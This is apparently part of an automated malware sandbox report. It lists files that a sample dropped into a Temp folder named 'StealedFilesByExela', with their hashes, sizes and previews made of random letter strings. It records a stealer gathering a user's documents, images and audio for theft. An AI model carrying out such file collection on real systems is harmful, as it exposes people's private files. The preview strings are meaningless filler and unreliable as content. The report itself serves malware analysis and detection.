Preview:	FAAGWHBVUUTPYVPHIDCKTSBBSJUWTPUSSQPMHQUEMEBFCRWOAGJBQFMXAGBRPPFMHYWZIVRYBYMLKSXBSVILBCREELIWCKXNLCFIWEZDKMNCFDFOVWLODVKQDZGKMNYKLEHRBLUSDVAZUPAREKTGWPSMEKUFMSLHXIKBIKFPKZTPIOVIWVCVEJBCECJMVZRWUFQKCHCDYMYSSNRYBTIYNJWBANTLSHUBWBRJPBZZNLFWUYJYBZIFPLPPSEZPOWEXVUHUJVJASMBCBQBMFYQHVFSDQVYOLOSARXZKXXONRBTMLGOTIENUWCOGJDANHCVTLBZKPLVIFICSYNNJDATITDCBHEATBFVVWLYLVGPXPBNVZHSPQOQVQNCQYBVJOQWIXIWBKDYYWBPNGFVJXXNBRMGKWWJYWGWBHIUEODZOQXRSLBZXJJPRVPCNTLVWWBLEVZTISPLUBADWNHYMMXYQUJWRECXAWEMKHIFYNPSWFNBKCKBCJAGWZVXGZAWQINZMAFPDGCTHXKXRDHWVKCCJQPZXLYTVPZLRVZELUVGBKPPWVPJNXPRLEEVEFJWIGEUIFCYFGOVZGYDSCDAQRMYJZQFYVLTANLMTLPXDPETVFGVJLPLKVCVPQFBHOXQRDYDIFYETSNYPWEVULVONZZBKSGIAZAMTXYMWISOFKQROAOZARHYXANJYXEXTERVKOFUSRDEHZCDOFBQMVCBXCHWUZOHSBRMBBAQNTBQIBXGWVMOGTTGSTIUIDNQZDCFUCSMZVEQTTRYGONMNKOUSVTNBMJXKCOXBLVQHFAAKIGBNDXZNYXNNSSESCPRHGMHBRSZZNJNGYXTMEQKCQQIYVDWDVXKEWBNJQQHOWQHHBAFFHTQLQQDBFVCGIUCNYMRAKDUTKSGMARKQACHUFYEGEUWZGJIPGBFYMIYONLAVYEOXUFICGTJCCRVOHBQQWRVQLRQIKKBTSDUERUZYUBPRBMCDSNKSKJAOCQNYWMDZDCEF

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\GLTYDMDUST.docx

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\GLTYDMDUST.xlsx

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.69569301223482
Encrypted:	false
SSDEEP:	24:P1aJ3UFXnPRRqJn5Ao7J4kXjiut748cX3Gg6hQk:P1aWFX5RQnAuh48cHGg6hQk
MD5:	CA404BEA65D84F58838AF73B2DC67E02
SHA1:	56EDE3A3BF70705B1D42A2AE13F6605057C1E5F6
SHA-256:	4A28C898DF5967827C26FD633CD56275159EF4C4C0193E484E8E8F3E9ECC66B9
SHA-512:	10C144317CDB5A368733346EB8440A986A377916F98BE0E8232E668A8C5E107E06829ADF575751B94D0B0AA37F4CAC48DBD7BC64FFE8DCB140FB033C00CEC721
Malicious:	false
Preview:	GLTYDMDUSTFARDVTDTOSUXWTZPBTWYSDUWRWNQMOYZIOPMOCUVTIJOHJYLHKBCEDWQBIYLQPLFXNZVXOZBIBDNIIHCNZHRIZBCANIAZPBFFJNXGCWLILIHHCYJHZSFIZUUDHFLQEWBBOMWJOZCKSAOAVKAWDPLPLVPHHMTSMKFCHYLMZJYKTJZUGPCSSVJJOKBWSTSLHJSIZZNIHOVEXPMQSKABHGSGHFUWVNTWTGYCLXOQEPAIEYRMLWJNNZHEPKXAHFKJUQHDHBHMPKXFCHXQYMICUKIVHNMPIJURPFBDBUQWHFTUVKPWMJHVOENGHYYNPMJPLPTQKABBVHNTLFXAJUISPUCEXPQFWXNQKGLSPRPJEAIJQZNYNOWAKNLRQHQRIOFXWLXEJZPOKNRPRZQJIGYXOWWZDFNURUOTFOOSKCNYLZXJZIWHYYUTOQRDTTRMPEMHZSRVZISBDQKRQYXAZOKOCTHUJKZWNHJSEMHTCSKCARZUYORNVIXVWTGAWUONMQVDITNHLNLJNREIEBPKELOMXBMEUBFTSVSGBVXSXHICRIGHIFVXWPXMIKKKCBOFCJGKJYZJDAWFCHWCNIMOPOPYUXDESMSSFNZBKRVTKTFPFGCIMVLKPBRKBRZJRHIYUQFAFEODGJZAXKRAFGTBXKKKTOXYTJBCHZWBDPBSBRTICVTUOWNEXJIZFESQAIMINDZJFLHIQSMVIICPGSEVSLVSVPMBXUGAPVVXVNJEBHRRBRPIHKGVJJDRANYKMMFJJBFPKFDJAROFBZANTWLCLSELNCCDRQUPZIMXLCVFZOFWKZYXCLQVRUFHUTIFPNWERRWWXHSVZHEYMHULWKGIIWKBRWODYKIGEPXGOEZXMJVKVNTEOQXZBOZBXYKMUGZUYMELGGHJJVDPONTLTQGITEMXYMMOGRWMQDUHIGHPJWPGIEZDZPFZHQMQKLTBUGJXLBLEGTFQZOXBPYRZFHNMZGVZGRAKFYTWDWWKV

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\GNLQNHOLWB.png

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698695541849584
Encrypted:	false
SSDEEP:	24:ZE+7+1bm31iNKty4eaTDMDURN6ZqyioAe1L:ZE+61bm0Qty41T5N6ZNLAeZ
MD5:	64E7020B0B401F75D3061A1917D99E04
SHA1:	785E09A2F76464E26CE282F41DE07D1B27FFB855
SHA-256:	9E5D6C897851C4A24A0D3BC4F9291A971550B9F1B9F9CFB86D7A2D5F12CD63B0
SHA-512:	14D18C0739A9B9097C2135DF001E31BA17772A9ED1DFC62318AD092C133F8C054E5C335354C57929137344E11AC6F0EBC5032211136D1F1B3F6DF8F1434D90E3
Malicious:	false
Preview:	GNLQNHOLWBOQVJIFTLNFGJNNXMGUZOMCUNVQXIPWIQSXJKHHVRYLBVHOHRRAZCZOOSABVUNECAWUZDTCLDYZAFJGGGUXKDFDPLZWHOYARDSHMWUJKNJPXNWQKOEVEVLWQLXKJLHTDQZQULYODUZGGIUHFXGBKGLAQBERUUCASFPJWCVSHYWEKXXBEZZVPBKVPPRGJJFXTGVBUVLUVQNAPBMPJOZNNFCDPEHNHWSMZSBAYITASRGZTGXSYUNNLKZKAVLGDGRIUVYOWINQLHMWTCZYYSGNSZQWZQNLKENKZJSDTJDSZVFQGHKVENDXCIHQVPCJNVXYVCJTKGGQJHTLGYJROSCXNGTCNNLCBSAOHAXWLQLCXTRIYCZVDEDWKBEHBEBKKXYVNQHTFFQFVFLHQRXMYLCHQAJKIRETOPSMFDVMJOROHVBDNWQMACXDCGCPKSQUIXWYXSYDPSBSUJMXEBPBCWJDOKOSFYRZQSCWEIHCQFTRYQVAUUYDVCYUHDRUKCTOGNWSTPHONXNHSHICTVCMWIDPOKQMNGFKZOADDJPTUVPEWWFNEKDLAVDZNBHHFIRSPGSQGUQUGGIRSVJTEIAUJEHUVHRJPWEMACBNRIWVFWWRDNGHYAESSKWHOCXLPYRMKQYTXSSYLKESQEPWVDSSTKTYQDQTTAUVWPQFTTJMGMEGRECDIFCMPKXTYYNGENSBDKEVPPDNRRDLULORZGHRQIQWLMHMKLKDLNSNWXWGTMDLMPWAGGPUJXOOYWOGWZTDKIVNNXMKJEFALSJECCOVZVTAPKGAXWCUMHLAHYBPLBTDXBKKPKPJFJOKZKMPEWOOMMMCZHSENRPGKEJJHHOVFETVBBFBTDTSNLGGPVPAFDOXRJUKYZTGOFQUAVOGUZJARUUCKMRYUSWZIRYUATBQRRVCNMFMMBTGSFQCAOTPTSBPCICPBMURXQOIITZCLXKSJVDGFLGHUIHTALRYCNLFILDCLQXDOGMOKPXT

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\HMPPSXQPQV.mp3

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\HMPPSXQPQV.pdf

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\HMPPSXQPQV.xlsx

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698711683401115
Encrypted:	false
SSDEEP:	24:qKHpKPokvebe5xXL3g76mBU/gS2JBbl20IS7pnXk:Rpcjnxbw7TYgS2nbzIS7pnXk
MD5:	47643CE7571E0C995094D7CE5F2005D7
SHA1:	40D42828B2F68C625EBD884FB8AF5B20F5A1DF9C
SHA-256:	1D642D4EC7BC821B0FFA28C3F2702C875C922139D8001EADD664EBCCF8D321B3
SHA-512:	3AAD0470C01D2609662C0B8D146BA79132B404C669C22032D085233E2D30725797AC2E15A11F54DFE00E4B6CA6E914E3439D4775B3AF6D782334FE9424F485A5
Malicious:	false
Preview:	HMPPSXQPQVZTKYGXRLZXZQHGCZSWFSMKAZTFZQVPBWYDEIQOYRZBKZROCVLLNDGOXMZATHCHJWBWCKMDMUVOMUCFYNBSIKMCOOAGLUHDSCAREEEQGTRYCAFLTFVCHREFHJJALACUPWFTGZJJVRRQBVOZGXIEUBTJBNHNAXRWAWTUYQZIZWPARDBZBFGZUBQQPINOCLFOLDPTMWQVUUBDSNGDFVMEOTHPNKBOMDPGLFXUXBXHUOTYRPUQTUJPKLUSNTISPNFAHVFBBWEWJQFBJFCDDWUUKCQJNEKMUTJEZKKMXXOCBOVMCGGYTPDYBYYFVGHQJJBCDHYWPXJUJWPNURQCUHPTATLFRAOGUCJWWSBAITHVPDRYRFCTPIWHJVKSAXOIPKHISTBCDZISGIVPPYDJLJWFRNVNCWIOINKYQLAFVLCPSGCZABGNTUVGEDQZGQNDECUBPLLOYUYTHXDNNCAXKLHFZXBBAWBICFREGZBLZZMPWRLUSXUNEXAKLSJETGNCJTTGSNPPSHZUKZDHHYHBBWKJUSIBAKGKHQJINZHCWLBCIIUGTVVLNEZXUBIPUVRAILLENTRJYFNIBHNOUNYAIFQBNUMFUSXNGITFIFZKTSFAQXDYVBIUCIUYJIGJTIJHWTPPRJQVSBHHUXLZRPPJOWJAPSVQQVKLFHKXZRPEJBFXNKVNBCPMLRQGCJINKLLBJVROFAFCDRFCDAMIDEYSZDWNLUMJZXGWKOIKNAYVXPYRZWMBNAAFKFOPCVNGUECOARMDWJVYVUQQAFEGKCYXVVGXPHPEVOMRADTQDTJSHAKHPNNOGUDWBRXDJFEMSJTJUJKHZONBLGDCDDUDTRQKPOFACELSKHFSBPKXKDGWOKSDBAMWLKXEAOOHWVOAQZGZCNSDWOXSHPTFMVMYQXTRNMUPZSFQXOQLPUFJWHWTXXIRMQXDPVAJKHMSCGTFVJKECYILRMHGFBWQKUNTRVZTBJQJAKTSJUIDOLPL

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\HQJBRDYKDE.jpg

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691179545447335
Encrypted:	false
SSDEEP:	24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
MD5:	70ED9F89ADEE0C43C2C82F30F075991E
SHA1:	0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
SHA-256:	4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
SHA-512:	A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
Malicious:	false
Preview:	HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\HQJBRDYKDE.mp3

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691179545447335
Encrypted:	false
SSDEEP:	24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
MD5:	70ED9F89ADEE0C43C2C82F30F075991E
SHA1:	0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
SHA-256:	4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
SHA-512:	A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
Malicious:	false
Preview:	HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\HQJBRDYKDE.pdf

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.691179545447335
Encrypted:	false
SSDEEP:	24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
MD5:	70ED9F89ADEE0C43C2C82F30F075991E
SHA1:	0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
SHA-256:	4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
SHA-512:	A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
Malicious:	false
Preview:	HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

C:\Users\user\AppData\Local\Temp\StealedFilesByExela\LFOPODGVOH.docx

Download File

Process:	C:\Users\user\Desktop\9afaXJv52z.exe
File Type:	ASCII text, with very long lines (1024), with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698393795110914
Encrypted:	false
SSDEEP:	24:weX7B5oYsT2B9e4Feb4OKL65JIiga/zOnv9iY81icgfiTetEc8E:FPoYsqB9e4dP63IigGOvo11LetEc8E
MD5:	7C5655873C22D2522B13B34841F82038
SHA1:	ED733AE5B3E813B97D69E7283AEB8085EFC62B78
SHA-256:	9A515FAA0EE108930EC0C597C9E2CA74B21C3C9D45F3F845954A65F3FA4C494D
SHA-512:	A98C25203B5A8C5C3FE7859E1B128BA3C0B5691BE716C53CA427770F10EC65CBB8B704EEA994BCE1ECA69EC4D46BCC0D48FE844653B964E96D1248D2E211CBD2
Malicious:	false
Preview:	LFOPODGVOHLLKBCXZQUOXPFEKGPKVDEYIZRZGQPAXXVWAHGTCBCWCYBHYOPHLEVYFLCEXNMVAAPUECIPRDZTIBJFGFXDAEMKYPYGCWSRTCUEEDISUDHVYQEPCSIKRBOXVZVTBFVUQHQYHEIWQPMZFNXNKGPPDGDMKJWAYJVYMRCYCWORBYPZYIFTAANBVDPJJOGYMYDPMPCNSOQVKLKNKHQVJQRYOOACYXVWFBJGOZRXUBDUSJEQNJXCVPHTUWAVCILOAXOWIJVWKMAIOEWTHGQELYIGVJJZNFBDSZXPZMLZNFDRIJQQQDSSMCBEMRHVOYIGRXSYQYDLBDBDJCVRREJGRUBPNYBFUCUXLMUIULULHCWJQQEMKBQMLJBDJQHFXPNODSTVZXWZZOXPIXKBRKMKOYEBDUBYOGMGXHFMCUIKRQYQMHGUBUAAFTMUCZNIIVAIOOBIASAJPKXIYIQIRVIIXGNUEDAXQJYWQXOBTAINKSTSHZGNUWVHVDUXVGWBWRXOYEGSIRNXRHBFOAWRQVFKAGDUSHRWQWJQRNMOGHTWFHOOZGRSVCSEJNMPDYUGTSBOMGHSHACUNTVVGKNAZSSLLQOXMCBVKFFAQLQCWYNIWPVJRECIKVCXZGCNHKXMQDPPOURAWIKZOZEFLDUYVIGDPGUMGOGBUYKGLVLWQSDAHAAIVFUNWQIWKRCSLCPMZBWBBDTBBVTZNYCLEIZNLQRHKBOLVTUTWSURDWQTCHAPUMJQWNVWVGFLAAPEHMLBUSYJCZDJUMZMKIOKIMVTYPMCXUXWVXIMVUCNXESHIVCKNFAALGDXCVJHQZWLDSAWNJWFBTHDBKGVKXLWDOPOOBJMPJCKUXVNFQVOUEIHJKOHTDCQCDOFQBMSQNWVDKTKWJ